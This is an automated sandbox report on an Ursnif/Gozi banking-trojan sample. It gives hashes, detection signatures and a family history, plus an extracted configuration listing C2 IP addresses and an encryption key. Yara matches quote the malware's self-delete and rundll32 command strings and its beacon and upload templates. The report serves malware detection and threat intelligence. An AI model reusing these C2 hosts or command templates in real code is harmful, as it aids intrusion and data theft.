Edit tour

Windows Analysis Report
server.exe

Overview

General Information

Sample Name:	server.exe
Analysis ID:	834121
MD5:	62c6ed30422b5876110ee6ab6660223e
SHA1:	60e1a1c26d35c9d90fb163364e3a4deec1d4016a
SHA256:	fbb595a285f1126d4bfe09240e40b1a8a66ac5024f90b5e64860bb872e05a248
Tags:	agenziaentrateexegoziisfbmefmiseursnif
Infos:

Detection

Ursnif

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Detected unpacking (changes PE section rights)

Malicious sample detected (through community Yara rule)

Detected unpacking (overwrites its own PE header)

Yara detected Ursnif

Found evasive API chain (may stop execution after checking system information)

Writes or reads registry keys via WMI

Writes registry values via WMI

Found API chain indicative of debugger detection

Machine Learning detection for sample

Uses 32bit PE files

Yara signature match

Antivirus or Machine Learning detection for unpacked file

Sample file is different than original file name gathered from version info

Contains functionality to query locales information (e.g. system language)

Found evasive API chain checking for process token information

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Contains functionality to call native functions

Tries to resolve domain names, but no domain seems valid (expired dropper behavior)

Contains functionality to dynamically determine API calls

Uses Microsoft's Enhanced Cryptographic Provider

Classification

Process Tree

System is w10x64

server.exe (PID: 5276 cmdline: C:\Users\user\Desktop\server.exe MD5: 62C6ED30422B5876110EE6AB6660223E)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Gozi, Ursnif	2000 Ursnif aka Snifula2006 Gozi v1.0, Gozi CRM, CRM, Papras2010 Gozi v2.0, Gozi ISFB, ISFB, Pandemyia(*)-> 2010 Gozi Prinimalka -> Vawtrak/NeverquestIn 2006, Gozi v1.0 ('Gozi CRM' aka 'CRM') aka Papras was first observed.It was offered as a CaaS, known as 76Service. This first version of Gozi was developed by Nikita Kurmin, and he borrowed code from Ursnif aka Snifula, a spyware developed by Alexey Ivanov around 2000, and some other kits. Gozi v1.0 thus had a formgrabber module and often is classified as Ursnif aka Snifula.In September 2010, the source code of a particular Gozi CRM dll version was leaked, which led to Vawtrak/Neverquest (in combination with Pony) via Gozi Prinimalka (a slightly modified Gozi v1.0) and Gozi v2.0 (aka 'Gozi ISFB' aka 'ISFB' aka Pandemyia). This version came with a webinject module.	No Attribution	http://blog.malwaremustdie.org/2013/02/the-infection-of-styx-exploit-kit.html http://researchcenter.paloaltonetworks.com/2017/02/unit42-banking-trojans-ursnif-global-distribution-networks-identified/ https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/gozi-italian-shellcode-dance https://blog.gdatasoftware.com/2016/11/29325-analysis-ursnif-spying-on-your-data-since-2007	https://malpedia.caad.fkie.fraunhofer.de/details/win.gozi

Malware Configuration

Threatname: Ursnif

{
  "RSA Public Key": "R0Bht5yr3xsiZRHpi1IcuQzz6YItuljDFrXOyTKoaQlwPAAozpclh3dtqYAoNTIiCOiLcKQId5qu05Sa2skMJuIISUXqEWSZ+IAZkoJ0OBq41i9MAk5jYXBlhytm5kbe+FMWRShoa8oCYchGlG9NgOodr8XQtZdDCJW9xmKfhwDRkZoE+G2m4TOwcjqzcerFacks/3HGeYJ/jMn7p8mdhgGNbMkoKIT/xFVRX5VcOCuobljxHriqIaIaQdUGlw8xtl5qDXpJ1csBauHGSZ6RQY7ls8Ja+v/1aH+JgeCIQ3FiKBeHVCv6UuNvcyy6vYLMPGQwddKCKyqcgzolzbWcSfALrntnMTN8HRf9wsUd/no=",
  "c2_domain": [
    "checklist.skype.com",
    "193.233.175.115",
    "185.68.93.20",
    "62.173.140.250",
    "46.8.210.133"
  ],
  "botnet": "7716",
  "server": "50",
  "serpent_key": "XmIRUTaZ9Sm6Rr81",
  "sleep_time": "45",
  "CONF_TIMEOUT": "20",
  "SetWaitableTimer_value": "0"
}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000003.501349661.0000000005428000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.501349661.0000000005428000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_fd494041	unknown	unknown	0x1228:$a1: /C ping localhost -n %u && del "%s" 0xea8:$a2: /C "copy "%s" "%s" /y && "%s" "%s" 0xf00:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S" 0xa9c:$a5: filename="%.4u.%lu" 0x63a:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x876:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xbb7:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xe6d:$a9: &whoami=%s 0xe56:$a10: %u.%u_%u_%u_x%u 0xd63:$a11: size=%u&hash=0x%08x 0xb1d:$a12: &uptime=%u 0x6fb:$a13: %systemroot%\system32\c_1252.nls 0x1298:$a14: IE10RunOnceLastShown_TIMESTAMP
00000000.00000003.501349661.0000000005428000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0xb54:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x63a:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xa68:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xcf2:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0xd96:$a9: Software\AppDataLow\Software\Microsoft\ 0x1ca8:$a9: Software\AppDataLow\Software\Microsoft\
00000000.00000003.501007098.0000000005428000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.501007098.0000000005428000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_fd494041	unknown	unknown	0x1228:$a1: /C ping localhost -n %u && del "%s" 0xea8:$a2: /C "copy "%s" "%s" /y && "%s" "%s" 0xf00:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S" 0xa9c:$a5: filename="%.4u.%lu" 0x63a:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x876:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xbb7:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xe6d:$a9: &whoami=%s 0xe56:$a10: %u.%u_%u_%u_x%u 0xd63:$a11: size=%u&hash=0x%08x 0xb1d:$a12: &uptime=%u 0x6fb:$a13: %systemroot%\system32\c_1252.nls 0x1298:$a14: IE10RunOnceLastShown_TIMESTAMP
00000000.00000003.501007098.0000000005428000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0xb54:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x63a:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xa68:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xcf2:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0xd96:$a9: Software\AppDataLow\Software\Microsoft\ 0x1ca8:$a9: Software\AppDataLow\Software\Microsoft\
00000000.00000002.524385059.0000000002BA6000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x5822:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000003.501403236.0000000005428000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.501403236.0000000005428000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_fd494041	unknown	unknown	0x1228:$a1: /C ping localhost -n %u && del "%s" 0xea8:$a2: /C "copy "%s" "%s" /y && "%s" "%s" 0xf00:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S" 0xa9c:$a5: filename="%.4u.%lu" 0x63a:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x876:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xbb7:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xe6d:$a9: &whoami=%s 0xe56:$a10: %u.%u_%u_%u_x%u 0xd63:$a11: size=%u&hash=0x%08x 0xb1d:$a12: &uptime=%u 0x6fb:$a13: %systemroot%\system32\c_1252.nls 0x1298:$a14: IE10RunOnceLastShown_TIMESTAMP
00000000.00000003.501403236.0000000005428000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0xb54:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x63a:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xa68:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xcf2:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0xd96:$a9: Software\AppDataLow\Software\Microsoft\ 0x1ca8:$a9: Software\AppDataLow\Software\Microsoft\
00000000.00000002.524298163.0000000002B80000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000003.500947253.0000000005428000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.500947253.0000000005428000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_fd494041	unknown	unknown	0x1228:$a1: /C ping localhost -n %u && del "%s" 0xea8:$a2: /C "copy "%s" "%s" /y && "%s" "%s" 0xf00:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S" 0xa9c:$a5: filename="%.4u.%lu" 0x63a:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x876:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xbb7:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xe6d:$a9: &whoami=%s 0xe56:$a10: %u.%u_%u_%u_x%u 0xd63:$a11: size=%u&hash=0x%08x 0xb1d:$a12: &uptime=%u 0x6fb:$a13: %systemroot%\system32\c_1252.nls 0x1298:$a14: IE10RunOnceLastShown_TIMESTAMP
00000000.00000003.500947253.0000000005428000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0xb54:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x63a:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xa68:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xcf2:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0xd96:$a9: Software\AppDataLow\Software\Microsoft\ 0x1ca8:$a9: Software\AppDataLow\Software\Microsoft\
00000000.00000002.524941718.0000000005428000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000002.524941718.0000000005428000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_fd494041	unknown	unknown	0x1228:$a1: /C ping localhost -n %u && del "%s" 0xea8:$a2: /C "copy "%s" "%s" /y && "%s" "%s" 0xf00:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S" 0xa9c:$a5: filename="%.4u.%lu" 0x63a:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x876:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xbb7:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xe6d:$a9: &whoami=%s 0xe56:$a10: %u.%u_%u_%u_x%u 0xd63:$a11: size=%u&hash=0x%08x 0xb1d:$a12: &uptime=%u 0x6fb:$a13: %systemroot%\system32\c_1252.nls 0x1298:$a14: IE10RunOnceLastShown_TIMESTAMP
00000000.00000002.524941718.0000000005428000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0xb54:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x63a:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xa68:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xcf2:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0xd96:$a9: Software\AppDataLow\Software\Microsoft\ 0x1ca8:$a9: Software\AppDataLow\Software\Microsoft\
00000000.00000002.524890605.0000000004E39000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000000.00000003.501177033.0000000005428000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.501177033.0000000005428000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_fd494041	unknown	unknown	0x1228:$a1: /C ping localhost -n %u && del "%s" 0xea8:$a2: /C "copy "%s" "%s" /y && "%s" "%s" 0xf00:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S" 0xa9c:$a5: filename="%.4u.%lu" 0x63a:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x876:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xbb7:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xe6d:$a9: &whoami=%s 0xe56:$a10: %u.%u_%u_%u_x%u 0xd63:$a11: size=%u&hash=0x%08x 0xb1d:$a12: &uptime=%u 0x6fb:$a13: %systemroot%\system32\c_1252.nls 0x1298:$a14: IE10RunOnceLastShown_TIMESTAMP
00000000.00000003.501177033.0000000005428000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0xb54:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x63a:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xa68:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xcf2:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0xd96:$a9: Software\AppDataLow\Software\Microsoft\ 0x1ca8:$a9: Software\AppDataLow\Software\Microsoft\
00000000.00000003.501140959.0000000005428000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.501140959.0000000005428000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_fd494041	unknown	unknown	0x1228:$a1: /C ping localhost -n %u && del "%s" 0xea8:$a2: /C "copy "%s" "%s" /y && "%s" "%s" 0xf00:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S" 0xa9c:$a5: filename="%.4u.%lu" 0x63a:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x876:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xbb7:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xe6d:$a9: &whoami=%s 0xe56:$a10: %u.%u_%u_%u_x%u 0xd63:$a11: size=%u&hash=0x%08x 0xb1d:$a12: &uptime=%u 0x6fb:$a13: %systemroot%\system32\c_1252.nls 0x1298:$a14: IE10RunOnceLastShown_TIMESTAMP
00000000.00000003.501140959.0000000005428000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0xb54:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x63a:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xa68:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xcf2:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0xd96:$a9: Software\AppDataLow\Software\Microsoft\ 0x1ca8:$a9: Software\AppDataLow\Software\Microsoft\
00000000.00000003.501379450.0000000005428000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.501379450.0000000005428000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_fd494041	unknown	unknown	0x1228:$a1: /C ping localhost -n %u && del "%s" 0xea8:$a2: /C "copy "%s" "%s" /y && "%s" "%s" 0xf00:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S" 0xa9c:$a5: filename="%.4u.%lu" 0x63a:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x876:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xbb7:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xe6d:$a9: &whoami=%s 0xe56:$a10: %u.%u_%u_%u_x%u 0xd63:$a11: size=%u&hash=0x%08x 0xb1d:$a12: &uptime=%u 0x6fb:$a13: %systemroot%\system32\c_1252.nls 0x1298:$a14: IE10RunOnceLastShown_TIMESTAMP
00000000.00000003.501379450.0000000005428000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0xb54:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x63a:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xa68:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xcf2:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0xd96:$a9: Software\AppDataLow\Software\Microsoft\ 0x1ca8:$a9: Software\AppDataLow\Software\Microsoft\
00000000.00000003.501210330.0000000005428000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.501210330.0000000005428000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_fd494041	unknown	unknown	0x1228:$a1: /C ping localhost -n %u && del "%s" 0xea8:$a2: /C "copy "%s" "%s" /y && "%s" "%s" 0xf00:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S" 0xa9c:$a5: filename="%.4u.%lu" 0x63a:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x876:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xbb7:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xe6d:$a9: &whoami=%s 0xe56:$a10: %u.%u_%u_%u_x%u 0xd63:$a11: size=%u&hash=0x%08x 0xb1d:$a12: &uptime=%u 0x6fb:$a13: %systemroot%\system32\c_1252.nls 0x1298:$a14: IE10RunOnceLastShown_TIMESTAMP
00000000.00000003.501210330.0000000005428000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0xb54:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x63a:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xa68:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xcf2:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0xd96:$a9: Software\AppDataLow\Software\Microsoft\ 0x1ca8:$a9: Software\AppDataLow\Software\Microsoft\
Process Memory Space: server.exe PID: 5276	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: server.exe PID: 5276	Windows_Trojan_Gozi_fd494041	unknown	unknown	0x4363:$a5: filename="%.4u.%lu" 0x4519:$a5: filename="%.4u.%lu" 0xf717:$a5: filename="%.4u.%lu" 0xf8cd:$a5: filename="%.4u.%lu" 0x3f16:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xf2ca:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x3a86:$a8: %08X-%04X-%04X-%04X-%08X%04X 0x3b67:$a8: %08X-%04X-%04X-%04X-%08X%04X 0x3dcb:$a8: %08X-%04X-%04X-%04X-%08X%04X 0x408a:$a8: %08X-%04X-%04X-%04X-%08X%04X 0x4463:$a8: %08X-%04X-%04X-%04X-%08X%04X 0x461b:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xeda0:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xee81:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xf023:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xf43e:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xf817:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xf9cf:$a8: %08X-%04X-%04X-%04X-%08X%04X 0x487b:$a9: &whoami=%s 0xfc2f:$a9: &whoami=%s 0x4864:$a10: %u.%u_%u_%u_x%u
Process Memory Space: server.exe PID: 5276	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0x440a:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x45c2:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0xf7be:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0xf976:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x3f16:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x3f73:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xf2ca:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xf327:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x432f:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x44e5:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xf6e3:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xf899:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x4715:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0x49ee:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0xfac9:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0xfda2:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0x47b7:$a9: Software\AppDataLow\Software\Microsoft\ 0x4a8b:$a9: Software\AppDataLow\Software\Microsoft\ 0x55ce:$a9: Software\AppDataLow\Software\Microsoft\ 0x561c:$a9: Software\AppDataLow\Software\Microsoft\ 0xfb6b:$a9: Software\AppDataLow\Software\Microsoft\
Click to see the 28 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.server.exe.4e394a0.3.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0.2.server.exe.47e0000.2.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security

Joe Sandbox Signatures

• AV Detection
• Cryptography
• Compliance
• Networking
• Key, Mouse, Clipboard, Microphone and Screen Capturing
• E-Banking Fraud
• Spam, unwanted Advertisements and Ransom Demands
• System Summary
• Data Obfuscation
• Hooking and other Techniques for Hiding and Protection
• Malware Analysis System Evasion
• Anti Debugging
• Language, Device and Operating System Detection
• Stealing of Sensitive Information
• Remote Access Functionality

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: server.exe	ReversingLabs: Detection: 37%
Source: server.exe	Virustotal: Detection: 40%			Perma Link

Machine Learning detection for sample

Source: server.exe

Joe Sandbox ML: detected

Source: 0.2.server.exe.400000.0.unpack

Avira: Label: TR/Crypt.XPACK.Gen7

Source: 00000000.00000002.524890605.0000000004E39000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: Ursnif {"RSA Public Key": "R0Bht5yr3xsiZRHpi1IcuQzz6YItuljDFrXOyTKoaQlwPAAozpclh3dtqYAoNTIiCOiLcKQId5qu05Sa2skMJuIISUXqEWSZ+IAZkoJ0OBq41i9MAk5jYXBlhytm5kbe+FMWRShoa8oCYchGlG9NgOodr8XQtZdDCJW9xmKfhwDRkZoE+G2m4TOwcjqzcerFacks/3HGeYJ/jMn7p8mdhgGNbMkoKIT/xFVRX5VcOCuobljxHriqIaIaQdUGlw8xtl5qDXpJ1csBauHGSZ6RQY7ls8Ja+v/1aH+JgeCIQ3FiKBeHVCv6UuNvcyy6vYLMPGQwddKCKyqcgzolzbWcSfALrntnMTN8HRf9wsUd/no=", "c2_domain": ["checklist.skype.com", "193.233.175.115", "185.68.93.20", "62.173.140.250", "46.8.210.133"], "botnet": "7716", "server": "50", "serpent_key": "XmIRUTaZ9Sm6Rr81", "sleep_time": "45", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}

Source: C:\Users\user\Desktop\server.exe

Code function: 0_2_047E1508 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,

0_2_047E1508

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\server.exe

Unpacked PE file: 0.2.server.exe.400000.0.unpack

Source: server.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\server.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown

DNS traffic detected: query: checklist.skype.com replaycode: Name error (3)

Source: unknown

DNS traffic detected: queries for: checklist.skype.com

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected Ursnif

Source: Yara match	File source: 00000000.00000003.501349661.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.501007098.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.501403236.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.500947253.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.524941718.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.501177033.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.501140959.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.501379450.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.501210330.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: server.exe PID: 5276, type: MEMORYSTR
Source: Yara match	File source: 0.2.server.exe.4e394a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.server.exe.47e0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.524890605.0000000004E39000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

E-Banking Fraud

Yara detected Ursnif

Source: Yara match	File source: 00000000.00000003.501349661.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.501007098.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.501403236.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.500947253.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.524941718.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.501177033.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.501140959.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.501379450.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.501210330.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: server.exe PID: 5276, type: MEMORYSTR
Source: Yara match	File source: 0.2.server.exe.4e394a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.server.exe.47e0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.524890605.0000000004E39000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\server.exe

Code function: 0_2_047E1508 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,

0_2_047E1508

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000000.00000003.501349661.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
